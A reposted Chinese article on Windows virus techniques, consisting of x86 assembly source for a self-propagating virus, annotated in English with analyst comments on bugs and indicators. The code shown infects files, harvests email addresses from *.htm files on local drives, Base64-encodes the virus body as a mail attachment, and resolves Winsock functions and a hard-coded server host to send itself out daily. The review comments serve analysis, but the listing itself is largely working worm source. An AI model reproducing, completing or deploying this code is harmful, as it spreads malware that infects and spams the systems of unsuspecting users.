Win9x/Winnt/Win2k/Winxp病毒技术探讨
push 0
lea eax,ByteWrite
push eax
push [edi].SizeOfRawData
lea eax,[offset VStart+ebx]
push eax
push hFile
mov eax , 12345678h
_WriteFile = dword ptr $-4
call eax
IF_F1:
push pMapping
mov eax , 12345678h
_UnmapViewOfFile = dword ptr $-4
call eax
IF_F2:
push hMapping
call _CloseHandle[ebx]
IF_F3:
push hFile
call _CloseHandle[ebx]
IF_Exit:
popad
ret 4
InfectFile ENDP
;*****************电子邮件传播线程***************************
;从本地、网络的*.htm*获得邮件地址.
;***********************************************************
;-----------------------------------------------------------------------
; MailThread — entry of the mail-propagation thread.
; This is a label, not a PROC: it never returns. It calls MailInit once,
; then loops forever: EnumDisk over the drives starting at "c:" with the
; FILE_HTM selector (the header above says this harvests addresses from
; *.htm* files), Sleep for 24 hours, repeat. No exit condition is visible.
; Analyst note (review): the fixed 24 h sleep and the literal "c:" are
; static artifacts of this sample; EnumDisk, MailInit, FILE_HTM and the
; @pushsz macro are defined outside this listing.
;-----------------------------------------------------------------------
MailThread:
call MailInit                  ; one-time setup: file map + Base64 + WSOCK32 imports + server IP
MT_Work:
push FILE_HTM                  ; file-type selector for EnumDisk (constant defined elsewhere)
@pushsz "c:"                   ; pushes a pointer to the inline string "c:" (macro defined elsewhere)
call EnumDisk
push 1000*60*60*24 ;sleep a day :)   ; Sleep(dwMilliseconds) = 86,400,000 ms = 24 h
call _Sleep[ebx]               ; import slot addressed through ebx (delta/base register, see MailInit)
jmp short MT_Work              ; unconditional: the thread loops until the process dies
;*********************************************************
;Mutate virus to BASE64 only once
;*********************************************************
;-----------------------------------------------------------------------
; MailInit — one-time setup for the mail thread (called from MailThread).
; What the visible code does, in order:
;   1. Opens szFilePath read-only, creates a PAGE_READONLY file mapping and
;      maps a read view of it (handles/pointer kept in the three LOCALs).
;   2. VirtualAlloc's SIZEOF_VIRUS_FILE*2 bytes of RW memory, stores the
;      pointer in Base64_Encoded_Data, and Base64-encodes SIZEOF_VIRUS_FILE
;      bytes of the mapped view into it (EncodeBase64: esi = src, edi = dst).
;   3. LoadLibraryA("WSOCK32.DLL"), resolves WSAStartup, socket,
;      gethostbyname, connect, send and closesocket by name, calls
;      WSAStartup(0x0202, WSA_Data), resolves the literal host name
;      "pact518.hit.edu.cn" and stores its first address in ServIP.
;   4. Unmaps the view and closes both handles. The DLL handle is kept
;      (no FreeLibrary in this block).
; Register use: ebx is the base/delta used for every data and import
; reference (`offset X + ebx`, `_Api[ebx]`); edi is 0 throughout the
; kernel32 calls and then holds the WSOCK32 module handle. pushad/popad
; preserve the caller's registers; nothing is returned.
; Review notes (no code changed here):
;   - No return value is checked: CreateFile (INVALID_HANDLE_VALUE),
;     CreateFileMapping / MapViewOfFile / VirtualAlloc / LoadLibraryA /
;     GetProcAddress (NULL), WSAStartup (error code), gethostbyname (NULL).
;     The MI_Close3 / MI_Close2 / MI_Close labels look like an unwinding
;     ladder, but nothing in this block jumps to them, so a failure simply
;     falls through into the next call with a bad handle or pointer; a NULL
;     hostent is dereferenced at `mov esi,[eax+12]`.
;   - Analyst/IOC notes: run-time import resolution by string from
;     WSOCK32.DLL and the hard-coded host name are static indicators.
;     The host is presumably the SMTP target of the send routine (its
;     header below says it connects to an SMTP server) — confirm.
;   - `_closecsoket` is a misspelling carried by the symbol name; it is
;     referenced elsewhere, so it is left as-is.
;-----------------------------------------------------------------------
MailInit PROC
LOCAL hFile : DWORD
LOCAL hMapping : DWORD
LOCAL pMapping : DWORD
pushad
xor edi,edi                             ; edi = 0, reused for every NULL/0 argument below
; CreateFile(szFilePath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL)
push edi                                ; hTemplateFile = NULL
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push edi                                ; lpSecurityAttributes = NULL
push FILE_SHARE_READ
push GENERIC_READ
lea eax,[offset szFilePath+ebx]         ; path string, addressed relative to ebx
push eax
call _CreateFile[ebx]
mov hFile,eax                           ; not compared against INVALID_HANDLE_VALUE
; CreateFileMapping(hFile, NULL, PAGE_READONLY, 0, 0, NULL)
push edi                                ; lpName = NULL
push edi                                ; dwMaximumSizeLow = 0
push edi                                ; dwMaximumSizeHigh = 0
push PAGE_READONLY
push edi                                ; lpAttributes = NULL
push eax                                ; hFile (still in eax)
call _CreateFileMapping[ebx]
mov hMapping,eax                        ; not checked for NULL
; MapViewOfFile(hMapping, FILE_MAP_READ, 0, 0, 0) — bytes = 0, i.e. the whole file per the API
push edi
push edi
push edi
push FILE_MAP_READ
push eax                                ; hMapping (still in eax)
call _MapViewOfFile[ebx]
mov pMapping,eax                        ; not checked for NULL
; VirtualAlloc(NULL, SIZEOF_VIRUS_FILE*2, MEM_RESERVE|MEM_COMMIT, PAGE_READWRITE)
push PAGE_READWRITE
push MEM_RESERVE or MEM_COMMIT
push SIZEOF_VIRUS_FILE*2                ; Base64 grows the data by ~4/3 plus CRLFs; 2x leaves headroom
push edi                                ; lpAddress = NULL (let the OS choose)
call _VirtualAlloc[ebx]
mov Base64_Encoded_Data[ebx],eax        ; destination pointer kept in a body variable (not checked for NULL)
mov esi,pMapping                        ; EncodeBase64: esi = source (mapped file)
mov edi,Base64_Encoded_Data[ebx]        ;               edi = destination buffer
call EncodeBase64
; Resolve Winsock exports at run time from the legacy WSOCK32.DLL (no static import)
@pushsz "WSOCK32.DLL"
call _LoadLibraryA[ebx]
xchg eax,edi ;hSockDll                  ; edi = module handle for the GetProcAddress calls below
@pushsz "WSAStartup"
push edi
call _GetProcAddress[ebx]
lea esi,[offset WSA_Data+ebx]
push esi                                ; lpWSAData
push 0202h ;!!!warning 2.2              ; wVersionRequested = 2.2 (author's own warning); result not checked
call eax
@pushsz "socket"
push edi
call _GetProcAddress[ebx]
mov [offset _socket+ebx],eax            ; cached pointer for the send-mail routine
@pushsz "gethostbyname"
push edi
call _GetProcAddress[ebx]
@pushsz "pact518.hit.edu.cn"            ; hard-coded server host name (IOC)
call eax                                ; gethostbyname(name) -> hostent* in eax, NULL on failure
mov esi,[eax+12]                        ; +12 = hostent.h_addr_list; faults if eax == NULL
lodsd                                   ; eax = h_addr_list[0] (pointer to the first address)
push [eax]
pop [offset ServIP + ebx]               ; ServIP = first 4-byte address
@pushsz "connect"
push edi
call _GetProcAddress[ebx]
mov [offset _connect+ebx],eax
@pushsz "send"
push edi
call _GetProcAddress[ebx]
mov [offset _send+ebx],eax
@pushsz "closesocket"
push edi
call _GetProcAddress[ebx]
mov [offset _closecsoket+ebx],eax       ; symbol name is misspelled (closecsoket); left as-is
; Cleanup. These labels are never targeted by a jump in this block — see header note.
MI_Close3:
push pMapping
call _UnmapViewOfFile[ebx]
MI_Close2:
push hMapping
call _CloseHandle[ebx]
MI_Close:
push hFile
call _CloseHandle[ebx]
MI_Exit:
popad
ret
MailInit ENDP
;**********************************
;esi <- Buffer with data to encode
;edi <- Destination buffer
;**********************************
;-----------------------------------------------------------------------
; EncodeBase64 — Base64-encode exactly SIZEOF_VIRUS_FILE bytes.
; In:   esi = source buffer, edi = destination buffer. No length or
;       destination bound is passed; the caller sizes both (MailInit
;       allocates SIZEOF_VIRUS_FILE*2).
; Out:  edi advanced past the last byte written (stosb/stosw); the output
;       ends with a CR LF. The alphabet is read from Base64DecodeTable
;       (indexed 0..63 relative to ebx) — despite the name it is used
;       for encoding (index -> character).
; Clobbers: eax, ecx, edx, edi, flags. ecx is the source byte index.
; Per iteration: gather up to 3 bytes into edx (bits 23..0), emit 4
; sextets via table lookup, then overwrite trailing output bytes with '='
; when the final group was short (2 bytes left -> "=", 1 byte -> "==").
; Review notes (no code changed here):
;   - As listed, `inc BASE64_lines` and the CR LF emitted every 0x13
;     (19 groups = 76 columns) sit between the second '=' store and
;     BASE64__03, so they execute only for a final 1-byte group; every
;     other iteration jumps straight to BASE64__03 and the output is never
;     line-wrapped. A conventional layout puts BASE64__03 before
;     `inc BASE64_lines`; this looks like a misplaced label in the
;     transcription — confirm against the original source.
;-----------------------------------------------------------------------
EncodeBase64 Proc
LOCAL BASE64_lines : DWORD              ; 4-char groups written on the current output line
xor ecx,ecx                             ; ecx = source offset
mov BASE64_lines,ecx
cld                                     ; stosb/stosw advance edi
BASE64encode_loop:
cmp ecx,SIZEOF_VIRUS_FILE
jae BASE64__exit                        ; all input consumed
xor edx,edx
mov dh,byte ptr [esi+ecx]               ; byte 0 -> bits 15..8 (bits 23..16 after the shift below)
inc ecx
cmp ecx,SIZEOF_VIRUS_FILE
jae BASE64__00                          ; only 1 byte in this group: byte 1 stays 0
mov dl,byte ptr [esi+ecx]               ; byte 1 -> bits 7..0 (bits 15..8 after the shift)
BASE64__00:
inc ecx
shl edx,08h
cmp ecx,SIZEOF_VIRUS_FILE
jae BASE64__01                          ; no byte 2: stays 0
mov dl,byte ptr [esi+ecx]               ; byte 2 -> bits 7..0
BASE64__01:
inc ecx                                 ; ecx may now exceed SIZEOF_VIRUS_FILE by 1 or 2; that overshoot drives the padding below
; sextet 1: bits 23..18
mov eax,edx
and eax,00fc0000h
shr eax,12h
mov al,byte ptr [eax+offset Base64DecodeTable+ebx]
stosb
; sextet 2: bits 17..12
mov eax,edx
and eax,0003f000h
shr eax,0Ch
mov al,byte ptr [eax+offset Base64DecodeTable+ebx]
stosb
; sextet 3: bits 11..6
mov eax,edx
and eax,00000fc0h
shr eax,06h
mov al,byte ptr [eax+offset Base64DecodeTable+ebx]
stosb
; sextet 4: bits 5..0
mov eax,edx
and eax,0000003fh
mov al,byte ptr [eax+offset Base64DecodeTable+ebx]
stosb
; Padding: overshoot of ecx tells how many input bytes the group lacked
cmp ecx,SIZEOF_VIRUS_FILE
jbe BASE64__02                          ; full 3-byte group: no padding
mov byte ptr [edi-00000001h],"="        ; group had <= 2 bytes: last output char becomes '='
BASE64__02:
cmp ecx,SIZEOF_VIRUS_FILE+01h
jbe BASE64__03                          ; taken for full groups and 2-byte groups
mov byte ptr [edi-00000002h],"="        ; group had 1 byte: second '='
; NOTE(review): everything from here to BASE64__03 runs only in the 1-byte case above
inc BASE64_lines
cmp BASE64_lines,00000013h              ; 0x13 = 19 groups = 76 output columns
jne BASE64encode_loop
mov ax,0A0Dh                            ; CR LF (0Dh then 0Ah in memory)
stosw
mov BASE64_lines,00000000h
BASE64__03:
jmp BASE64encode_loop
BASE64__exit:
mov ax,0A0Dh                            ; terminating CR LF
stosw
ret
EncodeBase64 EndP
;**********************************************
;发送邮件函数
;1. 连接SMTP Server
;2. 发送协议信息,发送BASE64编码的附件,发送其余数据
;warning: 发送数据的长度
;**********************************************
文章转载地址:http://www.cnpaf.net/Class/Virus/05122020353931644805.htm